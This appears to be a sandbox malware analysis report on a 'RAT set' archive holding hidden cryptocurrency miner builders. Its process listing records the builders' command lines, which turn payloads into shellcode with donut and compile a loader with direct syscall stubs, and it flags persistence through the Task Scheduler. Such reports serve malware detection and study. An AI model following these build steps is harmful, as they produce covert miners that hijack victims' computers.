Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5204 wrote to memory of 1040 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe
PID 5204 wrote to memory of 1040 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe
PID 5204 wrote to memory of 4304 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe
PID 5204 wrote to memory of 4304 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe
PID 4304 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4304 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2588 wrote to memory of 5516 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2588 wrote to memory of 5516 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4304 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 4304 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 4472 wrote to memory of 3324 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 4472 wrote to memory of 3324 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 4472 wrote to memory of 3324 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 3324 wrote to memory of 5544 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 5544 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 5544 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 5544 wrote to memory of 5548 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 5544 wrote to memory of 5548 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 5544 wrote to memory of 5548 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 5548 wrote to memory of 5520 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 5548 wrote to memory of 5520 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 5548 wrote to memory of 5520 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 4304 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe
PID 4304 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe
PID 4304 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe
PID 4304 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe
PID 4304 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4304 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5100 wrote to memory of 484 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5100 wrote to memory of 484 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4304 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4304 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5196 wrote to memory of 1172 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5196 wrote to memory of 1172 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4304 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 4304 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 1948 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 1948 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 1948 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 4404 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4404 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4404 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 6040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 2184 wrote to memory of 6040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 2184 wrote to memory of 6040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 6040 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 6040 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 6040 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 4304 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe
PID 4304 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe
PID 4304 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe
PID 4304 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe
PID 4304 wrote to memory of 5408 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 4304 wrote to memory of 5408 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 5408 wrote to memory of 4976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 5408 wrote to memory of 4976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 5408 wrote to memory of 4976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 4976 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4976 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4976 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4000 wrote to memory of 5936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 4000 wrote to memory of 5936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 4000 wrote to memory of 5936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 5936 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\whoisthisugly's RAT set.rar"

C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe

"C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zqlo2ilv\zqlo2ilv.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES127.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCF08CCC66BD4841DBA5321FC7798AD82C.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-watchdog.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd-watchdog-loader.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hlw5xyul\hlw5xyul.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14DE.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSC642E21C08BFA400D8E46E2C8B0DF89D4.TMP"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hmbilsec\hmbilsec.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F40.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSC711695CF99D449E5B3C16096BBFDCDBE.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-uninstaller-payload.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

